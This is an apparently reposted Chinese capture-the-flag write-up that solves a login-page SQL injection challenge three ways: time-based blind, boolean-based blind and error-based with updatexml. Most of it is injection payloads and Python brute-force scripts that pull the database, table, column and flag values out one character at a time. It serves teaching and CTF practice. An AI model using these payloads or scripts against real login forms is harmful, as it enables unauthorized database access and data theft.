一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2
本文共 8632 字,大约阅读时间需要 28 分钟。
概述
本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。 本题所有脚本均用傻逼爆破,没有用二分法,有兴趣的大佬可以根据我提供的脚本二次开发,可以的话在评论区给个链接(菜鸡对二分法不是很懂,觉得写脚本的时间还不如等爆破完成) 解法一:基于时间
测库名
首先测试库名长度
name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd
然后测试库名:
- 这里补充一个知识点,MySQL的substr函数
substr(a,b,c),a处为需要截取的字符,b处为从第几位开始,c处为截取几位。比如substr(database(),2,1)就是将数据库名从第2位开始截取1位,即取第二个字符(如果库名为note结果就是o)
name=1'+or+if(substr(database(),1,1)='n',sleep(1),1)#&pass=asdasd
n 写个脚本 import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"flag = ''length=4for num in range(1,length+1): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint(flag) 
测试表名
注意,这里‘select’被过滤了,可以使用双写绕过,也可以使用大小写绕过
name=1'+or+if(substr((seLEct+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1)='f',sleep(1),1)#&pass=asdasd
测第一位,结果是f
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,100): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint("flag:", flag) 
测试字段名
name=1'+or+if(substr((seLEct+group_concat(column_name)+from+information_schema.columns+where+table_name='fl4g'),1,1)='f',sleep(1),1)#&pass=asdasd
第一位是f,盲猜是flag,但是还是测试一下:
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,100): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("column_name:" , flag) breakprint("column_name:", flag) 字段名是flag
cat flag
查flag长度
name=1'+or+if(length((seLEct+flag+from+fl4g))=26,sleep(3),1)#&pass=asdasd
长度为26。
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"#sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"sql = "1' or if(substr((seLEct flag from fl4g),%d,1)='%s',sleep(2),1)#"flag = ''for num in range(1,27): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } # print(data) t = int(time.time()) r = requests.post(url = url , data=data) if int(time.time()) - t > 2 : flag += i print("flag:" , flag) breakprint("flag:", flag) 
解法二:基于布尔
分析
首先研究一下登录界面的报错信息
用admin登录,显示密码错误,用其他账号登录,显示账号不存在。这样子就说明了两个点: - 默认用户是admin
- 用户名栏可以判断我们的输入是
True还是False
burp抓包并发送试试:
admin: {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}w4ke: {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"} 这里都是页面信息,那么我们可以根据这个信息来进行判断我们的输入是否正确,构造payload:
name=1' or 1=1#&pass=asdasd
首先判断username = '1' ⇒ False然后判断 1=1 ⇒ TrueFalse or True ⇒ True
所以只要后面构造的是True,那么整个语句就是True,然后开始构造第一个攻击脚本
测试库名
name=1' or length(database())=4#&pass=asdasd
name=1' or substr(database(),1,1)='n'#&pass=asdasd
n 构造脚本: import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'sql = "1' or substr(database(),%d,1)='%s'#"flag = ''for num in range(1,5): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag) 
测表名
name=1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='f'#&pass=asdasd
f 上脚本 import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"flag = ''for num in range(1,8): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag) 
测字段名
name=1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),1,1)='f'#&pass=asdasd
f 上脚本:
import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"flag = ''for num in range(1,13): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.2) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag) 
cat flag
name=1' or substr((seLEct flag from fl4g),1,1)='n'#&pass=asdasd
n 上脚本: import requestsimport timel = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'#sql = "1' or substr(database(),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"#sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"sql = "=1' or substr((seLEct flag from fl4g),%d,1)='%s'#"flag = ""for num in range(1,28): for i in l: data = { 'name' : sql %(num,i), 'pass' : 'asdasd' } r = requests.post(url = url , data=data) time.sleep(0.05) if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text: flag += i print("flag:" , flag) breakprint("flag:", flag) 
解法三:基于报错
首先题目提示难度太大可以在url后面加一个?tips=1,菜鸡发现这边可以显示报错信息。
extractvalue,updatexml等,用法差不多,这边就用updatexml吧。 爆库名
name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=asdasd
爆表名
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&pass=asdasd
爆字段名
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)#&pass=asdasd
cat flag
name=1' and updatexml(1,concat(0x7e,(seLEct flag from fl4g),0x7e),1)#&pass=asdasd
转载地址:http://zopbi.baihongyu.com/
你可能感兴趣的文章
/dev/input/event0 键盘输入
查看>>
qt 创建异形窗体
查看>>
可重入函数与不可重入函数
查看>>
简单Linux C线程池
查看>>
内存池
查看>>
输入设备节点自动生成
查看>>
opencv test code-1
查看>>
eclipse 导入先前存在的项目
查看>>
GNU hello代码分析
查看>>
Qt继电器控制板代码
查看>>
busybox passwd修改密码
查看>>
wpa_supplicant控制脚本
查看>>
rfkill: WLAN hard blocked
查看>>
gstreamer相关工具集合
查看>>
arm 自动升级脚本
查看>>
RS232 四入四出模块控制代码
查看>>
gstreamer插件之 videotestsrc
查看>>
autoupdate script
查看>>
linux 驱动开发 头文件
查看>>
/etc/resolv.conf
查看>>